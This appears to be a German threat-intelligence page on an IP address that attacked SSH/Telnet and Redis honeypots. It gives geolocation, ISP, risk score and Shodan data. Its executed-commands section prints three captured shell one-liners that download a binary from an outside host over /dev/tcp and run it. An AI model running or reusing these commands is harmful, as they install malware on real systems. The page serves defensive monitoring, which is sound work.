Aktive Bedrohung • HOCH
120.220.243.134
Herkunftsland🇨🇳 China
Erste Erkennung5.5.2026
Letzte Aktivitat5.5.2026
ISPChina Mobile Communications Group Co., Ltd.
🎯
121
Gesamtangriffe
🔌
2
Ports
📡
2
Angriffsarten
🦠
3
Malware
Geolokalisierung
- Land
- 🇨🇳 China
- Stadt
- Unbekannt
- ASN
- AS9808
- ISP
- China Mobile Communications Group Co., Ltd.
Angriffsarten
ssh_telnet_honeypot
redis_honeypot
Angegriffene Ports
226379
Zugehorige Malware
Ausgefuhrte Befehle
$
nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/CcjQHuFCWJ && chmod +x /tmp/CcjQHuFCWJ && /tmp/CcjQHuFCWJ t563SDRXtI/P1I+/Si5ItITMyo+0TSBIv4zUy4i2VzFLsJDNwoSwSTFJtjbB90EVOHF/zDM6" &1x$
nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/HaHa6W74Pj && chmod +x /tmp/HaHa6W74Pj && /tmp/HaHa6W74Pj PUxsW3yIMpd9RGxVT1Jdb1B+ljGUfEpsVU5SXWtaZpcykGZdZVZKTF1tWriEi85AtTQTCKTW6MR9cA==" &1x$
nohup bash -c "exec 6<>/dev/tcp/114.215.193.12/60124 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/LggnKrORwP && chmod +x /tmp/LggnKrORwP && /tmp/LggnKrORwP o+dhqPG7p/Ssfvbb0elhq/+jpfSrZOfT2/V+qPOlu/SrZunV2v1mqfSlpbLNWbCtSt9oKQkKUB8T" &1xShodan InternetDB ExpositionShodan
InternetDB-Daten, nicht in Echtzeit
Ports
11160006379
CPEs
cpe:/a:redislabs:redis
Risikobewertung
60
/100
NiedrigMittelHochKritisch